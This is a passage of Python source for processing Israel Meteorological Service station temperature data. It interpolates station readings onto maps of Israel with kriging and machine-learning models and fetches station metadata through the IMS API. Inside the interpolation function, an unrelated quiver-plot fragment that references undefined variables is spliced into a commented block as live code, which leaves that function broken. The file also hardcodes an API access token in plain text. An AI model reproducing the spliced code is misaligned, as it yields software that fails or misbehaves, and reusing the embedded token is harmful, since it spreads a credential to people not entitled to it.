da[time_dim].min().dt.year.item()\n# ymax = da[time_dim].max().dt.year.item()\n# years_str = '{}_{}'.format(ymin, ymax)\n# new_filename = '_'.join([sta.upper(), 'TD', years_str])\n# new_filename = new_filename + '.nc'\n# print('saving resmapled station {} to {}'.format(sta, savepath))\n# comp = dict(zlib=True, complevel=9) # best compression\n# encoding = {var: comp for var in da.to_dataset(name=da.name).data_vars}\n# da.to_netcdf(savepath / new_filename, 'w', encoding=encoding)\n# print('Done resampling!')\n# # finally, resample to all samples and save:\n# for key in sample.keys():\n# resample_GNSS_TD(da, savepath, sample, sample_rate=key)\n return\n\n\ndef concat_GNSS_TD(path=ims_path):\n import xarray as xr\n from aux_gps import path_glob\n files = path_glob(path, 'GNSS_TD_*.nc')\n years = sorted([file.as_posix().split('/')[-1].split('_')[-1].split('.')[0]\n for file in files])\n ds_list = [xr.open_dataset(x) for x in files]\n time_dim = list(set(ds_list[0].dims))[0]\n ds = xr.concat(ds_list, time_dim)\n ds = ds.sortby(time_dim)\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n filename = 'GNSS_TD_ALL_{}-{}.nc'.format(years[0], years[-1])\n print('saving...')\n ds.to_netcdf(path / filename, 'w', encoding=encoding)\n print('{} was saved to {}'.format(filename, path))\n return ds\n\n\ndef Interpolating_models_ims(time='2013-10-19T22:00:00', var='TD', plot=True,\n gis_path=gis_path, method='okrig',\n dem_path=work_yuval / 'AW3D30', lapse_rate=5.,\n cv=None, rms=None, gridsearch=False):\n \"\"\"main 2d_interpolation from stations to map\"\"\"\n # cv usage is {'kfold': 5} or {'rkfold': [2, 3]}\n # TODO: try 1d modeling first, like T=f(lat)\n from sklearn.gaussian_process import GaussianProcessRegressor\n from sklearn.neighbors import KNeighborsRegressor\n from pykrige.rk import Krige\n import numpy as np\n from sklearn.svm import SVR\n from sklearn.linear_model import LinearRegression\n from sklearn.ensemble import RandomForestRegressor\n from scipy.spatial import Delaunay\n from scipy.interpolate import griddata\n from sklearn.metrics import mean_squared_error\n from aux_gps import coarse_dem\n import seaborn as sns\n import matplotlib.pyplot as plt\n import pyproj\n from sklearn.utils.estimator_checks import check_estimator\n from pykrige.compat import GridSearchCV\n lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n\n def parse_cv(cv):\n from sklearn.model_selection import KFold\n from sklearn.model_selection import RepeatedKFold\n from sklearn.model_selection import LeaveOneOut\n \"\"\"input:cv number or string\"\"\"\n # check for integer:\n if 'kfold' in cv.keys():\n n_splits = cv['kfold']\n print('CV is KFold with n_splits={}'.format(n_splits))\n return KFold(n_splits=n_splits)\n if 'rkfold' in cv.keys():\n n_splits = cv['rkfold'][0]\n n_repeats = cv['rkfold'][1]\n print('CV is ReapetedKFold with n_splits={},'.format(n_splits) +\n ' n_repeates={}'.format(n_repeats))\n return RepeatedKFold(n_splits=n_splits, n_repeats=n_repeats,\n random_state=42)\n if 'loo' in cv.keys():\n return LeaveOneOut()\n # from aux_gps import scale_xr\n da = create_lat_lon_mesh(points_per_degree=250) # 500?\n awd = coarse_dem(da)\n awd = awd.values\n geo_snap = geo_pandas_time_snapshot(var=var, datetime=time, plot=False)\n if var == 'TD':\n [a, b] = np.polyfit(geo_snap['alt'].values, geo_snap['TD'].values, 1)\n if lapse_rate == 'auto':\n lapse_rate = np.abs(a) * 1000\n fig, ax_lapse = plt.subplots(figsize=(10, 6))\n sns.regplot(data=geo_snap, x='alt', y='TD', color='r',\n scatter_kws={'color': 'b'}, ax=ax_lapse)\n suptitle = time.replace('T', ' ')\n ax_lapse.set_xlabel('Altitude [m]')\n ax_lapse.set_ylabel('Temperature [degC]')\n ax_lapse.text(0.5, 0.95, 'Lapse_rate: {:.2f} degC/km'.format(lapse_rate),\n horizontalalignment='center', verticalalignment='center',\n transform=ax_lapse.transAxes, fontsize=12, color='k',\n fontweight='bold')\n ax_lapse.grid()\n ax_lapse.set_title(suptitle, fontsize=14, fontweight='bold')\n# fig.suptitle(suptitle, fontsize=14, fontweight='bold')\n alts = []\n for i, row in geo_snap.iterrows():\n lat = da.sel(lat=row['lat'], method='nearest').lat.values\n lon = da.sel(lon=row['lon'], method='nearest').lon.values\n alt = row['alt']\n if lapse_rate is not None and var == 'TD':\n da.loc[{'lat': lat, 'lon': lon}] = row[var] + \\\n lapse_rate * alt / 1000.0\n alts.append(alt)\n elif lapse_rate is None or var != 'TD':\n da.loc[{'lat': lat, 'lon': lon}] = row[var]\n alts.append(alt)\n # da_scaled = scale_xr(da)\n c = np.linspace(min(da.lat.values), max(da.lat.values), da.shape[0])\n r = np.linspace(min(da.lon.values), max(da.lon.values), da.shape[1])\n rr, cc = np.meshgrid(r, c)\n vals = ~np.isnan(da.values)\n if lapse_rate is None:\n Xrr, Ycc, Z = pyproj.transform(\n lla, ecef, rr[vals], cc[vals], np.array(alts), radians=False)\n X = np.column_stack([Xrr, Ycc, Z])\n XX, YY, ZZ = pyproj.transform(lla, ecef, rr, cc, awd.values,\n radians=False)\n rr_cc_as_cols = np.column_stack([XX.flatten(), YY.flatten(),\n ZZ.flatten()])\n else:\n X = np.column_stack([rr[vals], cc[vals]])\n rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])\n # y = da_scaled.values[vals]\n y = da.values[vals]\n if method == 'gp-rbf':\n from sklearn.gaussian_process.kernels import RBF\n from sklearn.gaussian_process.kernels import WhiteKernel\n kernel = 1.0 * RBF(length_scale=0.25, length_scale_bounds=(1e-2, 1e3)) \\\n + WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))\n# kernel = None\n model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,\n n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n\n elif method == 'gp-qr':\n from sklearn.gaussian_process.kernels import RationalQuadratic\n from sklearn.gaussian_process.kernels import WhiteKernel\n kernel = RationalQuadratic(length_scale=100.0) \\\n + WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))\n model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,\n n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n elif method == 'knn':\n model = KNeighborsRegressor(n_neighbors=5, weights='distance')\n elif method == 'svr':\n model = SVR(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.1,\n gamma='auto_deprecated', kernel='rbf', max_iter=-1,\n shrinking=True, tol=0.001, verbose=False)\n elif method == 'okrig':\n model = Krige(method='ordinary', variogram_model='spherical',\n verbose=True)\n elif method == 'ukrig':\n model = Krige(method='universal', variogram_model='linear',\n verbose=True)\n# elif method == 'okrig3d':\n# # don't bother - MemoryError...\n# model = OrdinaryKriging3D(rr[vals], cc[vals], np.array(alts),\n# da.values[vals], variogram_model='linear',\n# verbose=True)\n# awd = coarse_dem(da)\n# interpolated, ss = model.execute('grid', r, c, awd['data'].values)\n# elif method == 'rkrig':\n# # est = LinearRegression()\n# est = RandomForestRegressor()\n# model = RegressionKriging(regression_model=est, n_closest_points=5,\n# verbose=True)\n# p = np.array(alts).reshape(-1, 1)\n# model.fit(p, X, y)\n# P = awd.flatten().reshape(-1, 1)\n# interpolated = model.predict(P, rr_cc_as_cols).reshape(da.values.shape)\n# try:\n# u = check_estimator(model)\n# except TypeError:\n# u = False\n# pass\n if cv is not None and not gridsearch: # and u is None):\n # from sklearn.model_selection import cross_validate\n from sklearn import metrics\n cv = parse_cv(cv)\n ytests = []\n ypreds = []\n for train_idx, test_idx in cv.split(X):\n X_train, X_test = X[train_idx], X[test_idx] # requires arrays\n y_train, y_test = y[train_idx], y[test_idx]\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n # there is only one y-test and y-pred per iteration over the loo.split,\n # so to get a proper graph, we append them to respective lists.\n ytests += list(y_test)\n ypreds += list(y_pred)\n true_vals = np.array(ytests)\n predicted = np.array(ypreds)\n r2 = metrics.r2_score(ytests, ypreds)\n ms_error = metrics.mean_squared_error(ytests, ypreds)\n print(\"R^2: {:.5f}%, MSE: {:.5f}\".format(r2*100, ms_error))\n if gridsearch:\n cv = parse_cv(cv)\n param_dict = {\"method\": [\"ordinary\", \"universal\"],\n \"variogram_model\": [\"linear\", \"power\", \"gaussian\",\n \"spherical\"],\n # \"nlags\": [4, 6, 8],\n # \"weight\": [True, False]\n }\n estimator = GridSearchCV(Krige(), param_dict, verbose=True, cv=cv,\n scoring='neg_mean_absolute_error',\n return_train_score=True, n_jobs=1)\n estimator.fit(X, y)\n if hasattr(estimator, 'best_score_'):\n print('best_score = {:.3f}'.format(estimator.best_score_))\n print('best_params = ', estimator.best_params_)\n \n return estimator\n# if (cv is not None and not u):\n# from sklearn import metrics\n# cv = parse_cv(cv)\n# ytests = []\n# ypreds = []\n# for train_idx, test_idx in cv.split(X):\n# X_train, X_test = X[train_idx], X[test_idx] # requires arrays\n# y_train, y_test = y[train_idx], y[test_idx]\n## model = UniversalKriging(X_train[:, 0], X_train[:, 1], y_train,\n## variogram_model='linear', verbose=False,\n## enable_plotting=False)\n# model.X_ORIG = X_train[:, 0]\n# model.X_ADJUSTED = model.X_ORIG\n# model.Y_ORIG = X_train[:, 1]\n# model.Y_ADJUSTED = model.Y_ORIG\n# model.Z = y_train\n# y_pred, ss = model.execute('points', X_test[0, 0],\n# X_test[0, 1])\n# # there is only one y-test and y-pred per iteration over the loo.split,\n# # so to get a proper graph, we append them to respective lists.\n# ytests += list(y_test) cmap = plt.get_cmap('spring', 10)\n Q = ax.quiver(isr['X'], isr['Y'], isr['U'], isr['V'],\n isr['cm_per_year'], cmap=cmap)\n fig.colorbar(Q, extend='max')\n\n# ypreds += list(y_pred)\n# true_vals = np.array(ytests)\n# predicted = np.array(ypreds)\n# r2 = metrics.r2_score(ytests, ypreds)\n# ms_error = metrics.mean_squared_error(ytests, ypreds)\n# print(\"R^2: {:.5f}%, MSE: {:.5f}\".format(r2*100, ms_error))\n# cv_results = cross_validate(gp, X, y, cv=cv, scoring='mean_squared_error',\n# return_train_score=True, n_jobs=-1)\n# test = xr.DataArray(cv_results['test_score'], dims=['kfold'])\n# train = xr.DataArray(cv_results['train_score'], dims=['kfold'])\n# train.name = 'train'\n# cds = test.to_dataset(name='test')\n# cds['train'] = train\n# cds['kfold'] = np.arange(len(cv_results['test_score'])) + 1\n# cds['mean_train'] = cds.train.mean('kfold')\n# cds['mean_test'] = cds.test.mean('kfold')\n\n # interpolated=griddata(X, y, (rr, cc), method='nearest')\n model.fit(X, y)\n interpolated = model.predict(rr_cc_as_cols).reshape(da.values.shape)\n da_inter = da.copy(data=interpolated)\n if lapse_rate is not None and var == 'TD':\n da_inter -= lapse_rate * awd / 1000.0\n if (rms is not None and cv is None): # or (rms is not None and not u):\n predicted = []\n true_vals = []\n for i, row in geo_snap.iterrows():\n lat = da.sel(lat=row['lat'], method='nearest').lat.values\n lon = da.sel(lon=row['lon'], method='nearest').lon.values\n pred = da_inter.loc[{'lat': lat, 'lon': lon}].values.item()\n true = row[var]\n predicted.append(pred)\n true_vals.append(true)\n predicted = np.array(predicted)\n true_vals = np.array(true_vals)\n ms_error = mean_squared_error(true_vals, predicted)\n print(\"MSE: {:.5f}\".format(ms_error))\n if plot:\n import salem\n from salem import DataLevels, Map\n import cartopy.crs as ccrs\n # import cartopy.io.shapereader as shpreader\n import matplotlib.pyplot as plt\n # fname = gis_path / 'ne_10m_admin_0_sovereignty.shp'\n # fname = gis_path / 'gadm36_ISR_0.shp'\n # ax = plt.axes(projection=ccrs.PlateCarree())\n f, ax = plt.subplots(figsize=(6, 10))\n # shdf = salem.read_shapefile(salem.get_demo_file('world_borders.shp'))\n shdf = salem.read_shapefile(gis_path / 'Israel_and_Yosh.shp')\n # shdf = shdf.loc[shdf['CNTRY_NAME'] == 'Israel'] # remove other countries\n shdf.crs = {'init': 'epsg:4326'}\n dsr = da_inter.salem.roi(shape=shdf)\n grid = dsr.salem.grid\n grid = da_inter.salem.grid\n sm = Map(grid)\n # sm.set_shapefile(gis_path / 'Israel_and_Yosh.shp')\n # sm = dsr.salem.quick_map(ax=ax)\n# sm2 = salem.Map(grid, factor=1)\n# sm2.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',\n# edgecolor='k')\n sm.set_data(dsr)\n # sm.set_nlevels(7)\n # sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),\n # cbar_title='degC')\n sm.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',\n edgecolor='k') # , facecolor='aqua')\n # sm.set_topography(awd.values, crs=awd.crs)\n # sm.set_rgb(crs=shdf.crs, natural_earth='hr') # ad\n # lakes = salem.read_shapefile(gis_path/'gis_osm_water_a_free_1.shp')\n sm.set_cmap(cm='rainbow')\n sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),\n cbar_title='degC')\n dl = DataLevels(geo_snap[var], levels=sm.levels)\n dl.set_cmap(sm.cmap)\n x, y = sm.grid.transform(geo_snap.lon.values, geo_snap.lat.values)\n ax.scatter(x, y, color=dl.to_rgb(), s=20, edgecolors='k', linewidths=0.5)\n suptitle = time.replace('T', ' ')\n f.suptitle(suptitle, fontsize=14, fontweight='bold')\n if (rms is not None or cv is not None) and (not gridsearch):\n import seaborn as sns\n f, ax = plt.subplots(1, 2, figsize=(12, 6))\n sns.scatterplot(x=true_vals, y=predicted, ax=ax[0], marker='.',\n s=100)\n resid = predicted - true_vals\n sns.distplot(resid, bins=5, color='c', label='residuals',\n ax=ax[1])\n rmean = np.mean(resid)\n rstd = np.std(resid)\n rmedian = np.median(resid)\n rmse = np.sqrt(mean_squared_error(true_vals, predicted))\n plt.axvline(rmean, color='r', linestyle='dashed', linewidth=1)\n _, max_ = plt.ylim()\n plt.text(rmean + rmean / 10, max_ - max_ / 10,\n 'Mean: {:.2f}, RMSE: {:.2f}'.format(rmean, rmse))\n f.tight_layout()\n # lakes.plot(ax=ax, color='b', edgecolor='k')\n # lake_borders = gpd.overlay(countries, capitals, how='difference')\n # adm1_shapes = list(shpreader.Reader(fname).geometries())\n # ax = plt.axes(projection=ccrs.PlateCarree())\n # ax.coastlines(resolution='10m')\n # ax.add_geometries(adm1_shapes, ccrs.PlateCarree(),\n # edgecolor='black', facecolor='gray', alpha=0.5)\n # da_inter.plot.pcolormesh('lon', 'lat', ax=ax)\n #geo_snap.plot(ax=ax, column=var, cmap='viridis', edgecolor='black',\n # legend=False)\n return da_inter\n\n\ndef create_lat_lon_mesh(lats=[29.5, 33.5], lons=[34, 36],\n points_per_degree=1000):\n import xarray as xr\n import numpy as np\n lat = np.arange(lats[0], lats[1], 1.0 / points_per_degree)\n lon = np.arange(lons[0], lons[1], 1.0 / points_per_degree)\n nans = np.nan * np.ones((len(lat), len(lon)))\n da = xr.DataArray(nans, dims=['lat', 'lon'])\n da['lat'] = lat\n da['lon'] = lon\n return da\n\n\ndef read_save_ims_10mins(path=ims_10mins_path, var='TD'):\n import xarray as xr\n search_str = '*' + var + '_10mins.nc'\n da_list = []\n for file_and_path in path.glob(search_str):\n da = xr.open_dataarray(file_and_path)\n print('reading ims 10mins {} data for {} station'.format(var, da.name))\n da_list.append(da)\n print('merging...')\n ds = xr.merge(da_list)\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n filename = 'ims_' + var + '_10mins.nc'\n print('saving...')\n ds.to_netcdf(path / filename, 'w', encoding=encoding)\n print('{} was saved to {}.'.format(filename, path))\n return ds\n\n\ndef analyse_10mins_ims_field(path=ims_10mins_path, var='TD',\n gis_path=gis_path, dem_path=work_yuval/'AW3D30'):\n import xarray as xr\n import collections\n import numpy as np\n # TODO: make 2d histogram of stations by altitude and time...\n awd = xr.open_rasterio(dem_path / 'israel_dem.tif')\n awd = awd.squeeze(drop=True)\n filename = 'ims_' + var + '_10mins.nc'\n ds = xr.open_dataset(path / filename)\n meta = read_ims_metadata_from_files(path=gis_path,\n filename='IMS_10mins_meta_data.xlsx')\n meta.index = meta.ID.astype('int')\n meta.drop('ID', axis=1, inplace=True)\n meta.sort_index(inplace=True)\n # there are some stations with the same altitude, i'm mapping them:\n duplicate_alts = [item for item, count in collections.Counter(\n meta['alt']).items() if count > 1]\n print(duplicate_alts)\n # then replacing them with a 1-meter seperations:\n for dup in duplicate_alts:\n dup_size = len(meta.loc[meta['alt'] == dup, 'alt'])\n start_value = meta.loc[meta['alt'] == dup, 'alt'].values[0]\n replace_values = np.arange(start_value, start_value + dup_size)\n print(\n 'duplicate {} has {} values, replacing with {}'.format(\n dup,\n dup_size,\n replace_values))\n meta.loc[meta['alt'] == dup, 'alt'] = replace_values\n for da in ds.data_vars.keys():\n id_ = ds[da].attrs['station_id']\n try:\n lat = meta.loc[id_, 'lat']\n lon = meta.loc[id_, 'lon']\n alt = meta.loc[id_, 'alt']\n except KeyError:\n lat = ds[da].attrs['station_lat']\n lon = ds[da].attrs['station_lon']\n print('station {} keyerror.'.format(da))\n alt = 'None'\n try:\n alt = awd.sel(x=float(lon), y=float(lat), method='nearest').values.item()\n except ValueError:\n print('station {} has not known lat or lon...'.format(ds[da].attrs['station_name']))\n ds[da].attrs['station_lat'] = lat\n ds[da].attrs['station_lon'] = lon\n ds[da].attrs['station_alt'] = alt\n return ds\n\n\ndef geo_pandas_time_snapshot(path=ims_path, var='TD', freq='10mins',\n datetime='2013-10-19T10:00:00',\n gis_path=gis_path, plot=True):\n import xarray as xr\n import pandas as pd\n import geopandas as gpd\n import matplotlib.pyplot as plt\n from aux_gps import path_glob\n # TODO: add simple df support\n # first, read ims_10mins data for choice var:\n # file should be : 'IMS_TD_israeli_10mins_filled.nc'\n glob_str = 'IMS_{}_israeli_{}*.nc'.format(var, freq)\n file = path_glob(path, glob_str=glob_str)[0]\n ds = xr.open_dataset(file)\n ds = ds.sel(time=datetime)\n# meta = read_ims_metadata_from_files(path=gis_path, option='10mins')\n# meta.index = meta.ID.astype('int')\n# meta.drop('ID', axis=1, inplace=True)\n# meta.sort_index(inplace=True)\n cols_list = []\n for dvar in ds.data_vars.values():\n value = dvar.values.item()\n id_ = dvar.attrs['station_id']\n lat = dvar.attrs['station_lat']\n lon = dvar.attrs['station_lon']\n alt = dvar.attrs['station_alt']\n name = dvar.name\n var_ = dvar.attrs['channel_name']\n cols = [pd.to_datetime(datetime), name, id_, lat, lon, alt,\n var_, value]\n cols_list.append(cols)\n df = pd.DataFrame(cols_list)\n df.columns = ['time', 'name', 'id', 'lat', 'lon', 'alt', 'var_name', var_]\n df.dropna(inplace=True)\n df = df.astype({'lat': 'float64', 'lon': 'float64'})\n # geopandas part:\n isr = gpd.read_file(gis_path / 'Israel_demog_yosh.shp')\n isr.crs = {'init': 'epsg:4326'}\n geo_snap = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.lon,\n df.lat),\n crs=isr.crs)\n if plot:\n ax = isr.plot()\n geo_snap.plot(ax=ax, column=var_, cmap='viridis', edgecolor='black',\n legend=True)\n plt.title(var_ + ' in ' + datetime)\n return geo_snap\n\n\ndef get_meta_data_hourly_ims_climate_database(ds):\n import pandas as pd\n name_list = []\n for name, da in ds.data_vars.items():\n data = [name.split('_')[0], da.attrs['station_id'], da.attrs['lat'],\n da.attrs['lon'], da.attrs['height']]\n name_list.append(data)\n df = pd.DataFrame(name_list)\n df.columns = ['name', 'id', 'lat', 'lon', 'height']\n return df\n\n\ndef proccess_hourly_ims_climate_database(path=ims_path, var='tas',\n times=('1996', '2019')):\n import xarray as xr\n import numpy as np\n ds = xr.open_dataset(path / 'hourly_ims.nc')\n if var is not None:\n ds = ds.sel({'var': var})\n print('selecting {} variables'.format(var))\n if times is not None:\n print('selecting times from {} to {}'.format(times[0], times[1]))\n ds = ds.sel(time=slice(times[0], times[1]))\n to_drop_list = []\n for name, da in ds.data_vars.items():\n if (np.isnan(da) == True).all().item():\n to_drop_list.append(name)\n ds = ds.drop(to_drop_list)\n return ds\n\n\ndef read_hourly_ims_climate_database(path=ims_path / 'ground',\n savepath=None):\n \"\"\"downloaded from tau...ds is a dataset of all stations,\n times is a time period\"\"\"\n import pandas as pd\n import xarray as xr\n from aux_gps import print_saved_file\n da_list = []\n for file in sorted(path.glob('*.csv')):\n name = file.as_posix().split('/')[-1].split('_')[0]\n sid = file.as_posix().split('/')[-1].split('_')[1]\n array_name = '_'.join([name, sid])\n print('reading {} station...'.format(array_name))\n df = pd.read_csv(file, index_col='time')\n df.index = pd.to_datetime(df.index)\n df.drop(labels=['Unnamed: 0', 'name'], axis=1, inplace=True)\n lat = df.loc[:, 'lat'][0]\n lon = df.loc[:, 'lon'][0]\n height = df.loc[:, 'height'][0]\n df.drop(labels=['lat', 'lon', 'height'], axis=1, inplace=True)\n da = df.to_xarray().to_array(dim='var')\n da.name = array_name\n da.attrs['station_id'] = sid\n da.attrs['lat'] = lat\n da.attrs['lon'] = lon\n da.attrs['height'] = height\n da_list.append(da)\n ds = xr.merge(da_list)\n print('Done!')\n if savepath is not None:\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n ds.to_netcdf(savepath / 'hourly_ims.nc', 'w', encoding=encoding)\n print_saved_file('hourly_ims.nc', savepath)\n return ds\n\n\ndef read_ims_metadata_from_files(path=gis_path, freq='10mins'):\n # for longer climate archive data use filename = IMS_climate_archive_meta_data.xls\n import pandas as pd\n \"\"\"parse ims stations meta-data\"\"\"\n if freq == '10mins':\n filename = 'IMS_10mins_meta_data.xlsx'\n ims = pd.read_excel(path / filename,\n sheet_name='מטה-דטה', skiprows=1)\n # drop two last cols and two last rows:\n ims = ims.drop(ims.columns[[-1, -2]], axis=1)\n ims = ims.drop(ims.tail(2).index)\n cols = ['#', 'ID', 'name_hebrew', 'name_english', 'east', 'west',\n 'lon', 'lat', 'alt', 'starting_date', 'variables', 'model',\n 'eq_position', 'wind_meter_height', 'notes']\n ims.columns = cols\n ims.index = ims['#'].astype(int)\n ims = ims.drop('#', axis=1)\n # fix lat, lon cols:\n ims['lat'] = ims['lat'].str.replace(u'\\xba', '').astype(float)\n ims['lon'] = ims['lon'].str.replace(u'\\xba', '').astype(float)\n # fix alt col:\n ims['alt'] = ims['alt'].replace('~', '', regex=True).astype(float)\n # fix starting date col:\n ims['starting_date'] = pd.to_datetime(ims['starting_date'])\n elif freq == 'hourly':\n filename = 'IMS_climate_archive_meta_data.xls'\n ims = pd.read_excel(path / filename,\n sheet_name='תחנות אקלים', skiprows=1)\n cols = ['ID', 'name_hebrew', 'name_english', 'station_type', 'east',\n 'west', 'lon', 'lat', 'alt', 'starting_date', 'closing_date',\n 'date_range']\n ims.columns = cols\n # ims.index = ims['ID'].astype(int)\n # ims = ims.drop('ID', axis=1)\n # fix lat, lon cols:\n ims['lat'] = ims['lat'].str.replace(u'\\xba', '').astype(float)\n ims['lon'] = ims['lon'].str.replace(u'\\xba', '').astype(float)\n # fix alt col:\n ims['alt'] = ims['alt'].replace('~', '', regex=True).astype(float)\n # fix starting date, closing_date col:\n ims['starting_date'] = pd.to_datetime(ims['starting_date'])\n ims['closing_date'] = pd.to_datetime(ims['closing_date'])\n return ims\n\n\ndef produce_geo_ims(path, freq='10mins',\n closed_stations=False, plot=True):\n import geopandas as gpd\n import numpy as np\n isr = gpd.read_file(path / 'Israel_and_Yosh.shp')\n isr.crs = {'init': 'epsg:4326'}\n ims = read_ims_metadata_from_files(path=path, freq=freq)\n if closed_stations:\n ims = ims[np.isnat(ims.closing_date)]\n geo_ims = gpd.GeoDataFrame(ims, geometry=gpd.points_from_xy(ims.lon,\n ims.lat),\n crs=isr.crs)\n if plot:\n ax = isr.plot()\n geo_ims.plot(ax=ax, column='alt', cmap='Reds', edgecolor='black',\n legend=True)\n return geo_ims\n\n\ndef ims_api_get_meta(active_only=True, channel_name='TD'):\n import requests\n import pandas as pd\n \"\"\"get meta data on 10mins ims stations\"\"\"\n myToken = 'f058958a-d8bd-47cc-95d7-7ecf98610e47'\n headers = {'Authorization': 'ApiToken ' + myToken}\n r = requests.get('https://api.ims.gov.il/v1/envista/stations/',\n headers=headers)\n stations_10mins = pd.DataFrame(r.json())\n # filter inactive stations:\n if active_only:\n stations_10mins = stations_10mins[stations_10mins.active]\n # arrange lat lon nicely and add channel num for dry temp:\n lat_ = []\n lon_ = []\n channelId_list = []\n for index, row in stations_10mins.iterrows():\n lat_.append(row['location']['latitude'])\n lon_.append(row['location']['longitude'])\n channel = [x['channelId'] for x in row.monitors if x['name'] ==\n channel_name]\n if channel:\n channelId_list.append(channel[0])\n else:\n channelId_list.append(None)\n stations_10mins['lat'] = lat_\n stations_10mins['lon'] = lon_\n stations_10mins[channel_name + '_channel'] = channelId_list\n stations_10mins.drop(['location', 'StationTarget', 'stationsTag'],\n axis=1, inplace=True)\n return stations_10mins\n\n\n#def download_ims_data(geo_df, path, end_date='2019-04-15'):\n# import requests\n# import glob\n# import pandas as pd\n#\n# def to_dataarray(df, index, row):\n# import pandas as pd\n# ds = df.to_xarray()\n# ds['time'] = pd.to_datetime(ds.time)\n# channel_name = ds.name.isel(time=0).values\n# channel_id = ds.id.isel(time=0).values\n# ds = ds.drop(['id', 'name'])\n# da = ds.to_array(dim='TD', name=str(index))\n# da.attrs['channel_id'] = channel_id.item()\n# da.attrs['channel_name'] = channel_name.item()\n# da.attrs['station_name'] = row.name_english\n# da.attrs['station_id'] = row.ID\n# da.attrs['station_lat'] = row.lat\n# da.attrs['station_lon'] = row.lon\n# da.attrs['station_alt'] = row.alt\n# return da\n#\n# def get_dates_list(starting_date, end_date):\n# \"\"\"divide the date span into full 1 years and a remainder, tolist\"\"\"\n# import numpy as np\n# import pandas as pd\n# end_date = pd.to_datetime(end_date)\n# s_year = starting_date.year\n# e_year = end_date.year\n# years = np.arange(s_year, e_year + 1)\n# dates = [starting_date.replace(year=x) for x in years]\n# if (end_date - dates[-1]).days > 0:\n# dates.append(end_date)\n# return dates\n#\n# myToken = 'f058958a-d8bd-47cc-95d7-7ecf98610e47'\n# headers = {'Authorization': 'ApiToken ' + myToken}\n# already_dl = []\n# for paths in glob.glob(path+'*_TD.nc'):\n# already_dl.append(paths.split('/')[-1].split('.')[0].split('_')[0])\n# to_download = list(set(geo_df.index.values.tolist()\n# ).difference(set(already_dl)))\n# if to_download:\n# geo_df = geo_df.loc[to_download]\n# for index, row in geo_df.iterrows():\n# # get a list of dates to download: (1 year old parts)\n# dates = get_dates_list(row.starting_date, end_date)\n# # get station id and channel id(only dry temperature):\n# name = row.name_english\n# station_id = row.ID\n# channel_id = row.channel_id\n# # if tempertue is not measuered in station , skip:\n# if channel_id == 0:\n# continue\n# print(\n# 'Getting IMS data for {} station(ID={}) from channel {}'.format(\n# name,\n# station_id,\n# channel_id))\n# # loop over one year time span and download:\n# df_list = []\n# for i in range(len(dates) - 1):\n# first_date = dates[i].strftime('%Y/%m/%d')\n# last_date = dates[i + 1].strftime('%Y/%m/%d')\n# print('proccesing dates: {} to {}'.format(first_date, last_date))\n# dl_command = ('https://api.ims.gov.il/v1/envista/stations/' +\n# str(station_id) + '/data/' + str(channel_id) +\n# '?from=' + first_date + '&to=' + last_date)\n# r = requests.get(dl_command, headers=headers)\n# if r.status_code == 204: # i.e., no content:\n# print('no content for this search, skipping...')\n# break\n# print('parsing to dataframe...')\n# df_list.append(parse_ims_to_df(r.json()['data']))\n# print('concatanating df and transforming to xarray...')\n# df_all = pd.concat(df_list)\n# # only valid results:\n# # df_valid = df_all[df_all['valid']]\n# df_all.index.name = 'time'\n# da = to_dataarray(df_all, index, row)\n# filename = index + '_TD.nc'\n# comp = dict(zlib=True, complevel=9) # best compression\n# encoding = {var: comp for var in da.to_dataset().data_vars}\n# print('saving to {} to {}'.format(filename, path))\n# da.to_netcdf(path + filename, 'w', encoding=encoding)\n# print('done!')\n# # return df_list\n# # pick station and time span\n# # download\n# # call parse_ims_to_df\n# # concatanate and save to nc\n# return\n\n\ndef fill_fix_all_10mins_IMS_stations(path=ims_10mins_path,\n savepath=ims_path,\n unique_index=True, field='TD',\n clim='dayofyear', fix_only=False):\n \"\"\"loop over all TD 10mins stations and first fix their lat/lon/alt from\n metadata file and then fill them with clim, then save them\n use specific station names to slice irrelevant data\"\"\"\n import xarray as xr\n from aux_gps import path_glob\n # TODO: redo this analysis with adding the hourly TD data\n meta = read_ims_metadata_from_files(freq='10mins')\n files = path_glob(path, '*{}_10mins.nc'.format(field))\n cnt = 1\n da_list = []\n for file_and_path in files:\n da = xr.open_dataarray(file_and_path)\n print('post-proccessing {} data for {} station, ({}/{})'.format(field,\n da.name, cnt, len(files)))\n sid = da.attrs['station_id']\n row = meta[meta.ID == sid]\n if da.name == 'ARIEL':\n da = da.loc['2000-09-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'TEL-YOSEF-20141223':\n da = da.loc['2007-10-01':]\n row = meta[meta.ID == 380]\n print('{} station is sliced and fixed!'.format(da.name))\n elif da.name == 'PARAN-20060124':\n da = da.loc['1995-04-01':]\n row = meta[meta.ID == 207]\n print('{} station is fixed!'.format(da.name))\n elif da.name == 'MIZPE-RAMON-20120927':\n row = meta[meta.ID == 379]\n print('{} station is fixed!'.format(da.name))\n elif da.name == 'SHANI':\n da = da.loc['1995-12-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'BET-ZAYDA':\n da = da.loc['1995-12-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'BEER-SHEVA-UNI':\n print('skipping {} station...'.format(da.name))\n continue\n no_row_in_meta = row.empty\n assert not no_row_in_meta\n if field == 'Rain':\n if da.name == 'YOTVATA':\n da = da.loc['2009-09-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 